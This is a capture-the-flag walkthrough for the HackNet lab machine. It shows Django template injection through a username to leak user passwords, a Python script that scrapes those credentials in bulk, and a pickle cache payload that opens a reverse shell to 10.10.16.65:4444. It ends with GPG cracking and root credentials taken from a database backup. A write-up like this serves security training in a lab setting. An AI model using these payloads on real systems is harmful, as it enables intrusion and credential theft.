# HTB-HackNet
create account and login
We can edit our user profile and upload a profile picture. Testing for insecure file upload vulnerabilities yielded no results.
I find this in search look wierd, i think we need to read information from him
When i try another function i found two endpoints:
* GET /like/<POST_ID> - Makes a like on a post
* GET /likes/<POST_ID> - Lists all users that liked the post
When i like a post then click to likes it appear the list user have like.
I was change my name to `{{ users }}`
Then like a post and click to likes, it appear like list user have like
```
<QuerySet [
<SocialUser: cyberghost>,
<SocialUser: shadowcaster>,
<SocialUser: glitch>,
<SocialUser: netninja>,
<SocialUser: exploit_wizard>,
<SocialUser: whitehat>,
<SocialUser: deepdive>,
<SocialUser: virus_viper>,
<SocialUser: brute_force>,
<SocialUser: {{ users }}>
]>
```
This [link](https://python.plainenglish.io/ssti-django-querysets-9de55c46cd1a) have some QuerySets very helpful
I try with `{{users.values}}`
Do the same method before and appear list username and password
```
<QuerySet [{'id': 2, 'email': 'hexhunter@ciphermail.com', 'username': 'hexhunter', 'password': 'H3xHunt3r!', 'picture': '2.jpg', 'about': 'A seasoned reverse engineer specializing in binary exploitation. Loves diving into hex editors and uncovering hidden data.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 6, 'email': 'shadowcaster@darkmail.net', 'username': 'shadowcaster', 'password': 'Sh@d0wC@st!', 'picture': '6.jpg', 'about': 'Specializes in social engineering and OSINT techniques. A master of blending into the digital shadows.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 7, 'email': 'blackhat_wolf@cypherx.com', 'username': 'blackhat_wolf', 'password': 'Bl@ckW0lfH@ck', 'picture': '7.png', 'about': 'A black hat hacker with a passion for ransomware development. Has a reputation for leaving no trace behind.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 9, 'email': 'glitch@cypherx.com', 'username': 'glitch', 'password': 'Gl1tchH@ckz', 'picture': '9.png', 'about': 'Specializes in glitching and fault injection attacks. Loves causing unexpected behavior in software and hardware.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 12, 'email': 'codebreaker@ciphermail.com', 'username': 'codebreaker', 'password': 'C0d3Br3@k!', 'picture': '12.png', 'about': 'A programmer with a talent for writing malicious code and cracking software protections. Loves breaking encryption algorithms.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': False, 'is_hidden': False, 'two_fa': False}, {'id': 16, 'email': 'shadowmancer@cypherx.com', 'username': 'shadowmancer', 'password': 'Sh@d0wM@ncer', 'picture': '16.png', 'about': 'A master of disguise in the digital world, using cloaking techniques and evasion tactics to remain unseen.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 21, 'email': 'whitehat@darkmail.net', 'username': 'whitehat', 'password': 'Wh!t3H@t2024', 'picture': '21.jpg', 'about': 'An ethical hacker with a mission to improve cybersecurity. Works to protect systems by exposing and patching vulnerabilities.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 24, 'email': 'brute_force@ciphermail.com', 'username': 'brute_force', 'password': 'BrUt3F0rc3#', 'picture': '24.jpg', 'about': 'Specializes in brute force attacks and password cracking. Loves the challenge of breaking into locked systems.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 25, 'email': 'shadowwalker@hushmail.com', 'username': 'shadowwalker', 'password': 'Sh@dowW@lk2024', 'picture': '25.jpg', 'about': 'A digital infiltrator who excels in covert operations. Always finds a way to walk through the shadows undetected.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': False, 'is_hidden': False, 'two_fa': False}, {'id': 29, 'email': 'a@a.com', 'username': '{{users.values}}', 'password': '1', 'picture': 'profile.png', 'about': '', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': True, 'two_fa': False}]>
```
So we need write script to get all information user
Script login by my account, then like all post and click all the likes to get last images have `<QuerySet`. If don't have try again. I use regex to find the html tag `<img>`. When find the correct img, i use regex to find username, password, email
```
import requests
import re
import html
url = "http://hacknet.htb/"
headers = {"Cookie": "csrftoken=EaItn7JfwzM0iH167M1YFtPDyIhlingh; sessionid=hv26i0t5dw4nz0dl40ko6n13heyu8unc"}
all_users = set()
for i in range(1, 31):
requests.get(f"{url}/like/{i}", headers=headers)
text = requests.get(f"{url}/likes/{i}", headers=headers).text
img_titles = re.findall(r'<img [^>]*title="([^"]*)"', text)
if not img_titles:
continue
last_title = html.unescape(img_titles[-1])
if "<QuerySet" not in last_title:
requests.get(f"{url}/like/{i}", headers=headers)
text = requests.get(f"{url}/likes/{i}", headers=headers).text
img_titles = re.findall(r'<img [^>]*title="([^"]*)"', text)
if img_titles:
last_title = html.unescape(img_titles[-1])
emails = re.findall(r"'email': '([^']*)'", last_title)
passwords = re.findall(r"'password': '([^']*)'", last_title)
usernames = re.findall(r"'username': '([^']*)'", last_title)
for email, p, username in zip(emails, passwords, usernames):
all_users.add(f"{email}:{p}:{username}")
for item in all_users:
print(item)
```
After a few minuties i get all account
So hidden account is mikey@hacknet.htb:mYd4rks1dEisH3re:backdoor_bandit
Then ssh to get user flag (you can try by hydra to confirm mikey password).
We need to have Lateral Movement to sandy and crack file gpg
Django uses different caching backends (FileBasedCache, Memcached, Redis). If no external cache is configured, Django defaults to storing cache data on the filesystem, typically under /var/tmp/django_cache/
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/django.html#pickle-backed-session-cookie-rce
Key observations:
* Directory is world-writable (777 permissions)
* Owned by user sandy and group www-data
* Django stores cache as Pickle files here
When visit the site /explore (or refreash), django create file cache
I use [this method](https://davidhamann.de/2020/04/05/exploiting-python-pickle/) to get revshell
```
import pickle
import base64
# Exploit object
class Exploit:
def __reduce__(self):
import os
return (os.system, (f'bash -c "bash -i >& /dev/tcp/10.10.16.65/4444 0>&1"',),)
payload = base64.b64encode(pickle.dumps(Exploit()))
print(payload)
```
Go to the site /explore (or refreash), django create file cache, then copy the base64 form the code and paste to all file cache.
Then refreash the page /explore and get shell user sandy
Do you remember the gpg encrypted files in the website directory above? We need to find private key to crack that file
I upload linpeas.sh to user sandy
And i find the folder private key in /home/sandy/.gnupg/private-keys-v1.d
I copy all the file in /home/sandy/.gnupg/private-keys-v1.d and /var/www/HackNet/backups/ to /tmp/test
I move all file to my kali
Convert GPG key to crackable hash and crack by john
Import the GPG key and Decrypt backup
Try with other file but when i open file backup2.sql and find password, db show the root password
root:h4ck3rs4re3veRywh3re99
Try ssh and it work, get root flag
Sign in with Wallet
Connect another wallet